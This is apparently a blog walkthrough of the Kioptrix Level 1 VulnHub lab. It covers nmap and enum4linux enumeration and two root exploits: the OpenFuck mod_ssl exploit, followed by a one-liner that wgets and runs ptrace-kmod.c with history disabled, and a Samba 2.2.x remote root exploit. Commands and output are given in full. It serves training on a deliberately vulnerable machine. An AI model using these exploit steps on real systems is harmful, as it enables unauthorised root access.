Kioptrix 1 Vulnhub
Mon, Jun 1, 2020
6-minute read
Kioptrix 1
URL: https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ Desc: Kioptrix Level 1 is an easy boot to root machine, it can be exploited using multiple vulnerabilities a few of which have been demonstrated below
1. Enumeration
Nmap
Command used:
nmap -sV -sC -O 192.168.48.131
Results:
nmap -sC -sV -A -O 192.168.48.131 [16/16]
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-27 16:26 EDT
Nmap scan report for 192.168.48.131
Host is up (0.00068s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
| 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
| 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_ 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2019-10-27T21:28:58+00:00; +1h01m51s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
|_ SSL2_DES_64_CBC_WITH_MD5
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:26:A4:B4 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop
Host script results:
|_clock-skew: 1h01m50s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE
HOP RTT ADDRESS
1 0.68 ms 192.168.48.131
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 127.45 seconds
Ports Open
- 22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
- 80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
- 111/tcp open rpcbind 2 (RPC #100000)
- 139/tcp open netbios-ssn Samba smbd (workgroup: vMYGROUP)
- 443/tcp open ssl/http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
- 1024/tcp open status 1 (RPC #100024)
Enum4linux
enum4linux 192.168.48.131
Results
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Oct 27 23:32:17 2019
...
=======================================
| OS information on 192.168.48.131 |
=======================================
[+] Got OS info for 192.168.48.131 from smbclient: Domain=[MYGROUP] OS=[Unix] **Server=[Samba 2.2.1a]**
[+] Got OS info for 192.168.48.131 from srvinfo:
KIOPTRIX Wk Sv PrQ Unx NT SNT Samba Server
platform_id : 500
os version : 4.5
server type : 0x9a03
...
==========================================
| Share Enumeration on 192.168.48.131 |
==========================================
WARNING: The "syslog" option is deprecated
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]
Sharename Type Comment
--------- ---- -------
IPC$ IPC IPC Service (Samba Server)
ADMIN$ IPC IPC Service (Samba Server)
Server Comment
--------- -------
KIOPTRIX Samba Server
Workgroup Master
--------- -------
MYGROUP KIOPTRIX
WORKGROUP ELSAFFA7
[+] Attempting to map shares on 192.168.48.131
//192.168.1.104/IPC$ [E] Can't understand response:
WARNING: The "syslog" option is deprecated
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]
NT\_STATUS\_NETWORK\_ACCESS\_DENIED listing \*
//192.168.48.131/ADMIN$ [E] Can't understand response:
WARNING: The "syslog" option is deprecated
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]
tree connect failed: NT\_STATUS\_WRONG\_PASSWORD
Enum4linux was able to identify the version of Samba as 2.2.1a
2.Exploitation
Getting root using Apache mod_ssl vulnerability.
--------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
Apache mod\_ssl 2.0.x - Remote Denial o | exploits/linux/dos/24590.txt
Apache mod\_ssl 2.8.x - Off-by-One HTAc | exploits/multiple/dos/21575.txt
Apache mod\_ssl < 2.8.7 OpenSSL - 'Open | exploits/unix/remote/21671.c
Apache mod\_ssl < 2.8.7 OpenSSL - 'Open | exploits/unix/remote/47080.c
Apache mod\_ssl < 2.8.7 OpenSSL - 'Open | exploits/unix/remote/764.c
Apache mod\_ssl OpenSSL < 0.9.6d / < 0. | exploits/unix/remote/40347.txt
--------------------------------------- ----------------------------------------
Shellcodes: No Result
The exploit exploits/unix/remote/47080.c matches both the apache version and the mod_ssl version. This is the updated version of previous OpenFuck exploit exploits/unix/remote/764.c
The exploit can be found here using this exploit needs aa few additional steps to be performed.
- install libssl-dev using command:
apt-get install libssl-dev
-
Compile the program with: gcc -o OpenFuck OpenFuck.c -lcrypto
-
Run the program using command:
./OpenFuck 0x6b 192.168.38.131 -c 50
Running it without any arguements shows a list of OS-Apache versions, the relevant ones to our system is: 0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1 0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2 After trying both these arguements, the 0x6b was the one that worked. The 0x6a arguements exits without spawning a shell.
####Result
:~# ./OpenFuck 0x6a 192.168.48.131 -c 50
*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
Connection... 50 of 50
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
Good Bye!
:~# ./OpenFuck 0x6b 192.168.48.131 -c 50
*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
Connection... 50 of 50
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
bash-2.05$ unset HISTFILE; cd /tmp; wget http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p;
--18:34:37-- http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:80... connected!
HTTP request sent, awaiting response... 301 Moved Permanently
Location: https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c [following]
--18:34:38-- https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]
0K ... 100% @ 1.87 MB/s
18:34:38 (1.25 MB/s) - `ptrace-kmod.c' saved [3921/3921]
[+] Attached to 1995
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
whoami
root
Getting Root using Samba Vulnerability.
We know the version of Samba which is 2.2.1a Searching for vulnerabilities on exploit.db We find this exploit which matches our samba version.
To run this exploit:
- Compile using: gcc 10.c -o samba-exp
- Run Exploit using
/samba-exp -b 0 -c 192.168.48.132 -C 40 192.168.48.131
Here, arguement passes to -c is host ip address and -C is victim ip address
Result
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Worked!
--------------------------------------------------------------
*** JE MOET JE MUIL HOUWE
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)
whoami
root
The Flag:
cat /var/mail/root
From root Sat Sep 26 11:42:10 2009
Return-Path: <root@kioptix.level1>
Received: (from root@localhost)
by kioptix.level1 (8.11.6/8.11.6) id n8QFgAZ01831
for root@kioptix.level1; Sat, 26 Sep 2009 11:42:10 -0400
Date: Sat, 26 Sep 2009 11:42:10 -0400
From: root <root@kioptix.level1>
Message-Id: <200909261542.n8QFgAZ01831@kioptix.level1>
To: root@kioptix.level1
Subject: About Level 2
Status: O
If you are reading this, you got root. Congratulations.
Level 2 won't be as easy...